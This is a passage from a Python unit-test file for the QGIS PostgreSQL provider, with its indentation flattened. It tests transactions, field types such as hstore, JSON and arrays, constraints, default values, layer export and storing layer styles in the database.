self.assertTrue(ft0.nextFeature(f))
# redo
vl.undoStack().redo()
# check that the pk of the feature has been changed
ft1 = vl.getFeatures('pk=1')
self.assertFalse(ft1.nextFeature(f))
def testTransactionConstraints(self):
# create a vector layer based on postgres
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'id\' table="qgis_test"."check_constraints" sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
# prepare a project with transactions enabled
p = QgsProject()
p.setAutoTransaction(True)
p.addMapLayers([vl])
# get feature
f = QgsFeature()
self.assertTrue(vl.getFeatures('id=1').nextFeature(f))
self.assertEqual(f.attributes(), [1, 4, 3])
# start edition
vl.startEditing()
# update attribute form with a failing constraints
# coming from the database if attributes are updated
# one at a time.
# Current feature: a = 4 / b = 3
# Update feature: a = 1 / b = 0
# If updated one at a time, '(a = 1) < (b = 3)' => FAIL!
form = QgsAttributeForm(vl, f)
for w in form.findChildren(QLabel):
if w.buddy():
spinBox = w.buddy()
if w.text() == 'a':
spinBox.setValue(1)
elif w.text() == 'b':
spinBox.setValue(0)
# save
form.save()
# check new values
self.assertTrue(vl.getFeatures('id=1').nextFeature(f))
self.assertEqual(f.attributes(), [1, 1, 0])
def testTransactionTuple(self):
# create a vector layer based on postgres
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
# prepare a project with transactions enabled
p = QgsProject()
p.setAutoTransaction(True)
p.addMapLayers([vl])
vl.startEditing()
# execute a query which returns a tuple
tr = vl.dataProvider().transaction()
sql = "select * from qgis_test.some_poly_data"
self.assertTrue(tr.executeSql(sql, False)[0])
# underlying data has not been modified
self.assertFalse(vl.isModified())
def testDomainTypes(self):
"""Test that domain types are correctly mapped"""
vl = QgsVectorLayer('%s table="qgis_test"."domains" sql=' %
(self.dbconn), "domains", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
expected = {}
expected['fld_var_char_domain'] = {'type': QVariant.String, 'typeName': 'qgis_test.var_char_domain',
'length': -1}
expected['fld_var_char_domain_6'] = {'type': QVariant.String, 'typeName': 'qgis_test.var_char_domain_6',
'length': 6}
expected['fld_character_domain'] = {'type': QVariant.String, 'typeName': 'qgis_test.character_domain',
'length': 1}
expected['fld_character_domain_6'] = {'type': QVariant.String, 'typeName': 'qgis_test.character_domain_6',
'length': 6}
expected['fld_char_domain'] = {
'type': QVariant.String, 'typeName': 'qgis_test.char_domain', 'length': 1}
expected['fld_char_domain_6'] = {
'type': QVariant.String, 'typeName': 'qgis_test.char_domain_6', 'length': 6}
expected['fld_text_domain'] = {
'type': QVariant.String, 'typeName': 'qgis_test.text_domain', 'length': -1}
expected['fld_numeric_domain'] = {'type': QVariant.Double, 'typeName': 'qgis_test.numeric_domain', 'length': 10,
'precision': 4}
for f, e in list(expected.items()):
self.assertEqual(
fields.at(fields.indexFromName(f)).type(), e['type'])
self.assertEqual(fields.at(fields.indexFromName(f)
).typeName(), e['typeName'])
self.assertEqual(
fields.at(fields.indexFromName(f)).length(), e['length'])
if 'precision' in e:
self.assertEqual(
fields.at(fields.indexFromName(f)).precision(), e['precision'])
def testRenameAttributes(self):
''' Test renameAttributes() '''
vl = QgsVectorLayer('%s table="qgis_test"."rename_table" sql=' % (
self.dbconn), "renames", "postgres")
provider = vl.dataProvider()
provider.renameAttributes({1: 'field1', 2: 'field2'})
# bad rename
self.assertFalse(provider.renameAttributes({-1: 'not_a_field'}))
self.assertFalse(provider.renameAttributes({100: 'not_a_field'}))
# already exists
self.assertFalse(provider.renameAttributes({1: 'field2'}))
# rename one field
self.assertTrue(provider.renameAttributes({1: 'newname'}))
self.assertEqual(provider.fields().at(1).name(), 'newname')
vl.updateFields()
fet = next(vl.getFeatures())
self.assertEqual(fet.fields()[1].name(), 'newname')
# rename two fields
self.assertTrue(provider.renameAttributes(
{1: 'newname2', 2: 'another'}))
self.assertEqual(provider.fields().at(1).name(), 'newname2')
self.assertEqual(provider.fields().at(2).name(), 'another')
vl.updateFields()
fet = next(vl.getFeatures())
self.assertEqual(fet.fields()[1].name(), 'newname2')
self.assertEqual(fet.fields()[2].name(), 'another')
# close layer and reopen, then recheck to confirm that changes were saved to db
del vl
vl = None
vl = QgsVectorLayer('%s table="qgis_test"."rename_table" sql=' % (
self.dbconn), "renames", "postgres")
provider = vl.dataProvider()
self.assertEqual(provider.fields().at(1).name(), 'newname2')
self.assertEqual(provider.fields().at(2).name(), 'another')
fet = next(vl.getFeatures())
self.assertEqual(fet.fields()[1].name(), 'newname2')
self.assertEqual(fet.fields()[2].name(), 'another')
def testEditorWidgetTypes(self):
"""Test that editor widget types can be fetched from the qgis_editor_widget_styles table"""
vl = QgsVectorLayer('%s table="qgis_test"."widget_styles" sql=' % (
self.dbconn), "widget_styles", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
setup1 = fields.field("fld1").editorWidgetSetup()
self.assertFalse(setup1.isNull())
self.assertEqual(setup1.type(), "FooEdit")
self.assertEqual(setup1.config(), {"param1": "value1", "param2": "2"})
best1 = QgsGui.editorWidgetRegistry().findBest(vl, "fld1")
self.assertEqual(best1.type(), "FooEdit")
self.assertEqual(best1.config(), setup1.config())
self.assertTrue(fields.field("fld2").editorWidgetSetup().isNull())
best2 = QgsGui.editorWidgetRegistry().findBest(vl, "fld2")
self.assertEqual(best2.type(), "TextEdit")
def testHstore(self):
vl = QgsVectorLayer('%s table="qgis_test"."dict" sql=' %
(self.dbconn), "testhstore", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('value')).type(), QVariant.Map)
f = next(vl.getFeatures(QgsFeatureRequest()))
value_idx = vl.fields().lookupField('value')
self.assertIsInstance(f.attributes()[value_idx], dict)
self.assertEqual(f.attributes()[value_idx], {'a': 'b', '1': '2'})
new_f = QgsFeature(vl.fields())
new_f['pk'] = NULL
new_f['value'] = {'simple': '1', 'doubleQuote': '"y"',
'quote': "'q'", 'backslash': '\\'}
r, fs = vl.dataProvider().addFeatures([new_f])
self.assertTrue(r)
new_pk = fs[0]['pk']
self.assertNotEqual(new_pk, NULL, fs[0].attributes())
try:
read_back = vl.getFeature(new_pk)
self.assertEqual(read_back['pk'], new_pk)
self.assertEqual(read_back['value'], new_f['value'])
finally:
self.assertTrue(vl.startEditing())
self.assertTrue(vl.deleteFeatures([new_pk]))
self.assertTrue(vl.commitChanges())
def testJson(self):
vl = QgsVectorLayer('%s table="qgis_test"."json" sql=' %
(self.dbconn), "testjson", "postgres")
self.assertTrue(vl.isValid())
attrs = (
123,
1233.45,
None,
True,
False,
r"String literal with \"quotes\" 'and' other funny chars []{};#/èé*",
[1, 2, 3.4, None],
[True, False],
{'a': 123, 'b': 123.34, 'c': 'a string', 'd': [
1, 2, 3], 'e': {'a': 123, 'b': 123.45}}
)
attrs2 = (
246,
2466.91,
None,
True,
False,
r"Yet another string literal with \"quotes\" 'and' other funny chars: π []{};#/èé*",
[2, 4, 3.14159, None],
[True, False],
{'a': 246, 'b': 246.68, 'c': 'a rounded area: π × r²', 'd': [
1, 2, 3], 'e': {'a': 246, 'b': 246.91}}
)
json_idx = vl.fields().lookupField('jvalue')
jsonb_idx = vl.fields().lookupField('jbvalue')
for attr in attrs:
# Add a new feature
vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
self.dbconn), "testjson", "postgres")
self.assertTrue(vl2.startEditing())
f = QgsFeature(vl2.fields())
f.setAttributes([None, attr, attr])
self.assertTrue(vl2.addFeatures([f]))
self.assertTrue(vl2.commitChanges(), attr)
# Read back
vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
self.dbconn), "testjson", "postgres")
fid = [f.id() for f in vl2.getFeatures()][-1]
f = vl2.getFeature(fid)
self.assertEqual(f.attributes(), [fid, attr, attr])
# Change attribute values
vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
self.dbconn), "testjson", "postgres")
fid = [f.id() for f in vl2.getFeatures()][-1]
self.assertTrue(vl2.startEditing())
self.assertTrue(vl2.changeAttributeValues(
fid, {json_idx: attr, jsonb_idx: attr}))
self.assertTrue(vl2.commitChanges())
# Read back
vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
self.dbconn), "testjson", "postgres")
f = vl2.getFeature(fid)
self.assertEqual(f.attributes(), [fid, attr, attr])
# Let's check changeFeatures:
for attr in attrs2:
vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
self.dbconn), "testjson", "postgres")
fid = [f.id() for f in vl2.getFeatures()][-1]
self.assertTrue(vl2.startEditing())
self.assertTrue(vl2.dataProvider().changeFeatures({fid: {json_idx: attr, jsonb_idx: attr}}, {}))
self.assertTrue(vl2.commitChanges())
# Read back again
vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
self.dbconn), "testjson", "postgres")
f = vl2.getFeature(fid)
self.assertEqual(f.attributes(), [fid, attr, attr])
def testStringArray(self):
vl = QgsVectorLayer('%s table="qgis_test"."string_array" sql=' % (
self.dbconn), "teststringarray", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName(
'value')).type(), QVariant.StringList)
self.assertEqual(fields.at(fields.indexFromName(
'value')).subType(), QVariant.String)
f = next(vl.getFeatures(QgsFeatureRequest()))
value_idx = vl.fields().lookupField('value')
self.assertIsInstance(f.attributes()[value_idx], list)
self.assertEqual(f.attributes()[value_idx], ['a', 'b', 'c'])
new_f = QgsFeature(vl.fields())
new_f['pk'] = NULL
new_f['value'] = ['simple', '"doubleQuote"', "'quote'", 'back\\slash']
r, fs = vl.dataProvider().addFeatures([new_f])
self.assertTrue(r)
new_pk = fs[0]['pk']
self.assertNotEqual(new_pk, NULL, fs[0].attributes())
try:
read_back = vl.getFeature(new_pk)
self.assertEqual(read_back['pk'], new_pk)
self.assertEqual(read_back['value'], new_f['value'])
finally:
self.assertTrue(vl.startEditing())
self.assertTrue(vl.deleteFeatures([new_pk]))
self.assertTrue(vl.commitChanges())
def testIntArray(self):
vl = QgsVectorLayer('%s table="qgis_test"."int_array" sql=' % (
self.dbconn), "testintarray", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('value')).type(), QVariant.List)
self.assertEqual(fields.at(fields.indexFromName(
'value')).subType(), QVariant.Int)
f = next(vl.getFeatures(QgsFeatureRequest()))
value_idx = vl.fields().lookupField('value')
self.assertIsInstance(f.attributes()[value_idx], list)
self.assertEqual(f.attributes()[value_idx], [1, 2, -5])
def testDoubleArray(self):
vl = QgsVectorLayer('%s table="qgis_test"."double_array" sql=' % (
self.dbconn), "testdoublearray", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('value')).type(), QVariant.List)
self.assertEqual(fields.at(fields.indexFromName(
'value')).subType(), QVariant.Double)
f = next(vl.getFeatures(QgsFeatureRequest()))
value_idx = vl.fields().lookupField('value')
self.assertIsInstance(f.attributes()[value_idx], list)
self.assertEqual(f.attributes()[value_idx], [1.1, 2, -5.12345])
def testNotNullConstraint(self):
vl = QgsVectorLayer('%s table="qgis_test"."constraints" sql=' % (
self.dbconn), "constraints", "postgres")
self.assertTrue(vl.isValid())
self.assertEqual(len(vl.fields()), 4)
# test some bad field indexes
self.assertEqual(vl.dataProvider().fieldConstraints(-1),
QgsFieldConstraints.Constraints())
self.assertEqual(vl.dataProvider().fieldConstraints(
1001), QgsFieldConstraints.Constraints())
self.assertTrue(vl.dataProvider().fieldConstraints(0) &
QgsFieldConstraints.ConstraintNotNull)
self.assertFalse(vl.dataProvider().fieldConstraints(1)
& QgsFieldConstraints.ConstraintNotNull)
self.assertTrue(vl.dataProvider().fieldConstraints(2) &
QgsFieldConstraints.ConstraintNotNull)
self.assertFalse(vl.dataProvider().fieldConstraints(3)
& QgsFieldConstraints.ConstraintNotNull)
# test that constraints have been saved to fields correctly
fields = vl.fields()
self.assertTrue(fields.at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
self.assertEqual(fields.at(0).constraints().constraintOrigin(QgsFieldConstraints.ConstraintNotNull),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertFalse(fields.at(1).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
self.assertTrue(fields.at(2).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
self.assertEqual(fields.at(2).constraints().constraintOrigin(QgsFieldConstraints.ConstraintNotNull),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertFalse(fields.at(3).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
def testUniqueConstraint(self):
vl = QgsVectorLayer('%s table="qgis_test"."constraints" sql=' % (
self.dbconn), "constraints", "postgres")
self.assertTrue(vl.isValid())
self.assertEqual(len(vl.fields()), 4)
# test some bad field indexes
self.assertEqual(vl.dataProvider().fieldConstraints(-1),
QgsFieldConstraints.Constraints())
self.assertEqual(vl.dataProvider().fieldConstraints(
1001), QgsFieldConstraints.Constraints())
self.assertTrue(vl.dataProvider().fieldConstraints(0)
& QgsFieldConstraints.ConstraintUnique)
self.assertTrue(vl.dataProvider().fieldConstraints(1)
& QgsFieldConstraints.ConstraintUnique)
self.assertTrue(vl.dataProvider().fieldConstraints(2)
& QgsFieldConstraints.ConstraintUnique)
self.assertFalse(vl.dataProvider().fieldConstraints(3)
& QgsFieldConstraints.ConstraintUnique)
# test that constraints have been saved to fields correctly
fields = vl.fields()
self.assertTrue(fields.at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
self.assertEqual(fields.at(0).constraints().constraintOrigin(QgsFieldConstraints.ConstraintUnique),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertTrue(fields.at(1).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
self.assertEqual(fields.at(1).constraints().constraintOrigin(QgsFieldConstraints.ConstraintUnique),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertTrue(fields.at(2).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
self.assertEqual(fields.at(2).constraints().constraintOrigin(QgsFieldConstraints.ConstraintUnique),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertFalse(fields.at(3).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
def testConstraintOverwrite(self):
""" test that Postgres provider constraints can't be overwritten by vector layer method """
vl = QgsVectorLayer('%s table="qgis_test"."constraints" sql=' % (
self.dbconn), "constraints", "postgres")
self.assertTrue(vl.isValid())
self.assertTrue(vl.dataProvider().fieldConstraints(0) &
QgsFieldConstraints.ConstraintNotNull)
self.assertTrue(vl.fields().at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
# add a constraint at the layer level
vl.setFieldConstraint(0, QgsFieldConstraints.ConstraintUnique)
# should be no change at provider level
self.assertTrue(vl.dataProvider().fieldConstraints(0) &
QgsFieldConstraints.ConstraintNotNull)
# but layer should still keep provider constraints...
self.assertTrue(vl.fields().at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
self.assertTrue(vl.fieldConstraints(
0) & QgsFieldConstraints.ConstraintNotNull)
# ...in addition to layer level constraint
self.assertTrue(vl.fields().at(0).constraints(
).constraints() & QgsFieldConstraints.ConstraintUnique)
self.assertTrue(vl.fieldConstraints(
0) & QgsFieldConstraints.ConstraintUnique)
def testVectorLayerUtilsUniqueWithProviderDefault(self):
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
default_clause = 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)'
vl.dataProvider().setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, False)
self.assertEqual(
vl.dataProvider().defaultValueClause(0), default_clause)
self.assertTrue(QgsVectorLayerUtils.valueExists(vl, 0, 4))
vl.startEditing()
f = QgsFeature(vl.fields())
f.setAttribute(0, default_clause)
self.assertFalse(
QgsVectorLayerUtils.valueExists(vl, 0, default_clause))
self.assertTrue(vl.addFeatures([f]))
# the default value clause should exist...
self.assertTrue(QgsVectorLayerUtils.valueExists(vl, 0, default_clause))
# but it should not prevent the attribute being validated
self.assertTrue(QgsVectorLayerUtils.validateAttribute(vl, f, 0))
vl.rollBack()
def testSkipConstraintCheck(self):
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
default_clause = 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)'
vl.dataProvider().setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, False)
self.assertTrue(vl.dataProvider().skipConstraintCheck(
0, QgsFieldConstraints.ConstraintUnique, default_clause))
self.assertFalse(vl.dataProvider().skipConstraintCheck(
0, QgsFieldConstraints.ConstraintUnique, 59))
def testVectorLayerUtilsCreateFeatureWithProviderDefault(self):
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
default_clause = 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)'
self.assertEqual(
vl.dataProvider().defaultValueClause(0), default_clause)
# If an attribute map is provided, QgsVectorLayerUtils.createFeature must
# respect it, otherwise default values from provider are checked.
# User's choice will not be respected if the value violates unique constraints.
# See https://github.com/qgis/QGIS/issues/27758
f = QgsVectorLayerUtils.createFeature(vl, attributes={1: 5, 3: 'map'})
# changed so that createFeature respects user choice
self.assertEqual(f.attributes(), [
default_clause, 5, "'qgis'::text", 'map', None, None, None, None, None])
vl.setDefaultValueDefinition(3, QgsDefaultValue("'mappy'"))
# test ignore vector layer default value expression overrides postgres provider default clause,
# due to user's choice
f = QgsVectorLayerUtils.createFeature(vl, attributes={1: 5, 3: 'map'})
self.assertEqual(f.attributes(), [
default_clause, 5, "'qgis'::text", 'map', None, None, None, None, None])
# Since user did not enter a default for field 3, test must return the default value chosen
f = QgsVectorLayerUtils.createFeature(vl, attributes={1: 5})
self.assertEqual(f.attributes(), [
default_clause, 5, "'qgis'::text", 'mappy', None, None, None, None, None])
# See https://github.com/qgis/QGIS/issues/23127
def testNumericPrecision(self):
uri = 'point?field=f1:int'
uri += '&field=f2:double(6,4)'
uri += '&field=f3:string(20)'
lyr = QgsVectorLayer(uri, "x", "memory")
self.assertTrue(lyr.isValid())
f = QgsFeature(lyr.fields())
f['f1'] = 1
f['f2'] = 123.456
f['f3'] = '12345678.90123456789'
lyr.dataProvider().addFeatures([f])
uri = '%s table="qgis_test"."b18155" (g) key=\'f1\'' % (self.dbconn)
self.execSQLCommand('DROP TABLE IF EXISTS qgis_test.b18155')
err = QgsVectorLayerExporter.exportLayer(
lyr, uri, "postgres", lyr.crs())
self.assertEqual(err[0], QgsVectorLayerExporter.NoError,
'unexpected import error {0}'.format(err))
lyr = QgsVectorLayer(uri, "y", "postgres")
self.assertTrue(lyr.isValid())
f = next(lyr.getFeatures())
self.assertEqual(f['f1'], 1)
self.assertEqual(f['f2'], 123.456)
self.assertEqual(f['f3'], '12345678.90123456789')
# See https://github.com/qgis/QGIS/issues/23163
def testImportKey(self):
uri = 'point?field=f1:int'
uri += '&field=F2:double(6,4)'
uri += '&field=f3:string(20)'
lyr = QgsVectorLayer(uri, "x", "memory")
self.assertTrue(lyr.isValid())
def testKey(lyr, key, kfnames):
self.execSQLCommand('DROP TABLE IF EXISTS qgis_test.import_test')
uri = '%s table="qgis_test"."import_test" (g)' % self.dbconn
if key is not None:
uri += ' key=\'%s\'' % key
err = QgsVectorLayerExporter.exportLayer(
lyr, uri, "postgres", lyr.crs())
self.assertEqual(err[0], QgsVectorLayerExporter.NoError,
'unexpected import error {0}'.format(err))
olyr = QgsVectorLayer(uri, "y", "postgres")
self.assertTrue(olyr.isValid())
flds = lyr.fields()
oflds = olyr.fields()
if key is None:
# if the pkey was not given, it will create a pkey
self.assertEqual(oflds.size(), flds.size() + 1)
self.assertEqual(oflds[0].name(), kfnames[0])
for i in range(flds.size()):
self.assertEqual(oflds[i + 1].name(), flds[i].name())
else:
# pkey was given, no extra field generated
self.assertEqual(oflds.size(), flds.size())
for i in range(oflds.size()):
self.assertEqual(oflds[i].name(), flds[i].name())
pks = olyr.primaryKeyAttributes()
self.assertEqual(len(pks), len(kfnames))
for i in range(0, len(kfnames)):
self.assertEqual(oflds[pks[i]].name(), kfnames[i])
testKey(lyr, 'f1', ['f1'])
testKey(lyr, '"f1"', ['f1'])
testKey(lyr, '"f1","F2"', ['f1', 'F2'])
testKey(lyr, '"f1","F2","f3"', ['f1', 'F2', 'f3'])
testKey(lyr, None, ['id'])
# See https://github.com/qgis/QGIS/issues/25415
def testImportWithoutSchema(self):
def _test(table, schema=None):
self.execSQLCommand('DROP TABLE IF EXISTS %s CASCADE' % table)
uri = 'point?field=f1:int'
uri += '&field=F2:double(6,4)'
uri += '&field=f3:string(20)'
lyr = QgsVectorLayer(uri, "x", "memory")
self.assertTrue(lyr.isValid())
table = ("%s" % table) if schema is None else (
"\"%s\".\"%s\"" % (schema, table))
dest_uri = "%s sslmode=disable table=%s (geom) sql" % (
self.dbconn, table)
QgsVectorLayerExporter.exportLayer(
lyr, dest_uri, "postgres", lyr.crs())
olyr = QgsVectorLayer(dest_uri, "y", "postgres")
self.assertTrue(olyr.isValid(), "Failed URI: %s" % dest_uri)
# Test bug 17518
_test('b17518')
# Test fully qualified table (with schema)
_test("b17518", "qgis_test")
# Test empty schema
_test("b17518", "")
# Test public schema
_test("b17518", "public")
# Test fully qualified table (with wrong schema)
with self.assertRaises(AssertionError):
_test("b17518", "qgis_test_wrong")
def testStyle(self):
self.execSQLCommand('DROP TABLE IF EXISTS layer_styles CASCADE')
vl = self.getEditableLayer()
self.assertTrue(vl.isValid())
self.assertTrue(
vl.dataProvider().isSaveAndLoadStyleToDatabaseSupported())
self.assertTrue(vl.dataProvider().isDeleteStyleFromDatabaseSupported())
# table layer_styles does not exit
related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
self.assertEqual(related_count, -1)
self.assertEqual(idlist, [])
self.assertEqual(namelist, [])
self.assertEqual(desclist, [])
self.assertNotEqual(errmsg, "")
qml, errmsg = vl.getStyleFromDatabase("1")
self.assertEqual(qml, "")
self.assertNotEqual(errmsg, "")
mFilePath = QDir.toNativeSeparators(
'%s/symbol_layer/%s.qml' % (unitTestDataPath(), "singleSymbol"))
status = vl.loadNamedStyle(mFilePath)
self.assertTrue(status)
# The style is saved as non-default
errorMsg = vl.saveStyleToDatabase(
"by day", "faded greens and elegant patterns", False, "")
self.assertEqual(errorMsg, "")
# the style id should be "1", not "by day"
qml, errmsg = vl.getStyleFromDatabase("by day")
self.assertEqual(qml, "")
self.assertNotEqual(errmsg, "")
related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
self.assertEqual(related_count, 1)
self.assertEqual(errmsg, "")
self.assertEqual(idlist, ["1"])
self.assertEqual(namelist, ["by day"])
self.assertEqual(desclist, ["faded greens and elegant patterns"])
qml, errmsg = vl.getStyleFromDatabase("100")
self.assertEqual(qml, "")
self.assertNotEqual(errmsg, "")
qml, errmsg = vl.getStyleFromDatabase("1")
self.assertTrue(qml.startswith('<!DOCTYPE qgis'), qml)
self.assertEqual(errmsg, "")
res, errmsg = vl.deleteStyleFromDatabase("100")
self.assertTrue(res)
self.assertEqual(errmsg, "")
res, errmsg = vl.deleteStyleFromDatabase("1")
self.assertTrue(res)
self.assertEqual(errmsg, "")
# We save now the style again twice but with one as default
errorMsg = vl.saveStyleToDatabase(
"related style", "faded greens and elegant patterns", False, "")
self.assertEqual(errorMsg, "")
errorMsg = vl.saveStyleToDatabase(
"default style", "faded greens and elegant patterns", True, "")
self.assertEqual(errorMsg, "")
related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
self.assertEqual(related_count, 2)
self.assertEqual(errmsg, "")
self.assertEqual(idlist, ["3", "2"]) # Ids must be reversed.
self.assertEqual(namelist, ["default style", "related style"])
self.assertEqual(desclist, ["faded greens and elegant patterns"] * 2)
# We remove these 2 styles
res, errmsg = vl.deleteStyleFromDatabase("2")
self.assertTrue(res)
self.assertEqual(errmsg, "")
res, errmsg = vl.deleteStyleFromDatabase("3")
self.assertTrue(res)
self.assertEqual(errmsg, "")
# table layer_styles does exit, but is now empty
related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
self.assertEqual(related_count, 0)
self.assertEqual(idlist, [])
self.assertEqual(namelist, [])
self.assertEqual(desclist, [])
self.assertEqual(errmsg, "")
def testStyleWithGeometryType(self):
"""Test saving styles with the additional geometry type
Layers are created from geometries_table
"""
myconn = 'service=\'qgis_test\''
if 'QGIS_PGTEST_DB' in os.environ:
myconn = os.environ['QGIS_PGTEST_DB']
# point layer
myPoint = QgsVectorLayer(
myconn +
' sslmode=disable srid=4326 type=POINT table="qgis_test"."geometries_table" (geom) sql=', 'Point',
'postgres')
self.assertTrue(myPoint.isValid())
myPoint.saveStyleToDatabase('myPointStyle', '', False, '')
# polygon layer
myPolygon = QgsVectorLayer(
myconn +
' sslmode=disable srid=4326 type=POLYGON table="qgis_test"."geometries_table" (geom) sql=', 'Poly',
'postgres')
self.assertTrue(myPoint.isValid())
myPolygon.saveStyleToDatabase('myPolygonStyle', '', False, '')
# how many
related_count, idlist, namelist, desclist, errmsg = myPolygon.listStylesInDatabase()
self.assertEqual(len(idlist), 2)
self.assertEqual(namelist, ['myPolygonStyle', 'myPointStyle'])
# raw psycopg2 query
self.assertTrue(self.con)
cur = self.con.cursor()
self.assertTrue(cur)
cur.execute("select stylename, type from layer_styles order by type")
self.assertEqual(cur.fetchall(), [
('myPointStyle', 'Point'), ('myPolygonStyle', 'Polygon')])
cur.close()
# delete them
myPolygon.deleteStyleFromDatabase(idlist[1])
myPolygon.deleteStyleFromDatabase(idlist[0])
styles = myPolygon.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 0)
def testSaveStyleInvalidXML(self):
self.execSQLCommand('DROP TABLE IF EXISTS layer_styles CASCADE')
vl = self.getEditableLayer()
self.assertTrue(vl.isValid())
self.assertTrue(
vl.dataProvider().isSaveAndLoadStyleToDatabaseSupported())
self.assertTrue(vl.dataProvider().isDeleteStyleFromDatabaseSupported())
mFilePath = QDir.toNativeSeparators(
'%s/symbol_layer/%s.qml' % (unitTestDataPath(), "fontSymbol"))
status = vl.loadNamedStyle(mFilePath)
self.assertTrue(status)
errorMsg = vl.saveStyleToDatabase(
"fontSymbol", "font with invalid utf8 char", False, "")
self.assertEqual(errorMsg, "")
qml, errmsg = vl.getStyleFromDatabase("1")
self.assertTrue('v="\u001E"' in qml)
self.assertEqual(errmsg, "")
# Test loadStyle from metadata
md = QgsProviderRegistry.instance().providerMetadata('postgres')
qml = md.loadStyle(self.dbconn + " type=POINT table=\"qgis_test\".\"editData\" (geom)", 'fontSymbol')
self.assertTrue(qml.startswith('<!DOCTYPE qgi'), qml)
self.assertTrue('v="\u001E"' in qml)
def testHasMetadata(self):
# views don't have metadata
vl = QgsVectorLayer('{} table="qgis_test"."{}" key="pk" sql='.format(self.dbconn, 'bikes_view'), "bikes_view",
"postgres")
self.assertTrue(vl.isValid())
self.assertFalse(vl.dataProvider().hasMetadata())
# ordinary tables have metadata
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
self.assertTrue(vl.isValid())
self.assertTrue(vl.dataProvider().hasMetadata())
def testReadExtentOnView(self):
# vector layer based on view
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data_view" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
self.assertFalse(vl0.dataProvider().hasMetadata())
# set a custom extent
originalExtent = vl0.extent()
customExtent = QgsRectangle(-80, 80, -70, 90)
vl0.setExtent(customExtent)
# write xml
doc = QDomDocument("testdoc")
elem = doc.createElement("maplayer")
self.assertTrue(vl0.writeLayerXml(elem, doc, QgsReadWriteContext()))
# read xml with the custom extent. It should not be used by default
vl1 = QgsVectorLayer()
vl1.readLayerXml(elem, QgsReadWriteContext())
self.assertTrue(vl1.isValid())
self.assertEqual(vl1.extent(), originalExtent)
# read xml with custom extent with readExtent option. Extent read from
# xml document should be used because we have a view
vl2 = QgsVectorLayer()
vl2.setReadExtentFromXml(True)
vl2.readLayerXml(elem, QgsReadWriteContext())
self.assertTrue(vl2.isValid())
self.assertEqual(vl2.extent(), customExtent)
# but a force update on extent should allow retrieveing the data
# provider extent
vl2.updateExtents()
vl2.readLayerXml(elem, QgsReadWriteContext())
self.assertEqual(vl2.extent(), customExtent)
vl2.updateExtents(force=True)
vl2.readLayerXml(elem, QgsReadWriteContext())
self.assertEqual(vl2.extent(), originalExtent)
def testReadExtentOnTable(self):
# vector layer based on a standard table
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
self.assertTrue(vl0.dataProvider().hasMetadata())
# set a custom extent
originalExtent = vl0.extent()
customExtent = QgsRectangle(-80, 80, -70, 90)
vl0.setExtent(customExtent)
# write xml
doc = QDomDocument("testdoc")
elem = doc.createElement("maplayer")
self.assertTrue(vl0.writeLayerXml(elem, doc, QgsReadWriteContext()))
# read xml with the custom extent. It should not be used by default
vl1 = QgsVectorLayer()
vl1.readLayerXml(elem, QgsReadWriteContext())
self.assertTrue(vl1.isValid())
self.assertEqual(vl1.extent(), originalExtent)
# read xml with custom extent with readExtent option. Extent read from
# xml document should NOT be used because we don't have a view or a
# materialized view
vl2 = QgsVectorLayer()
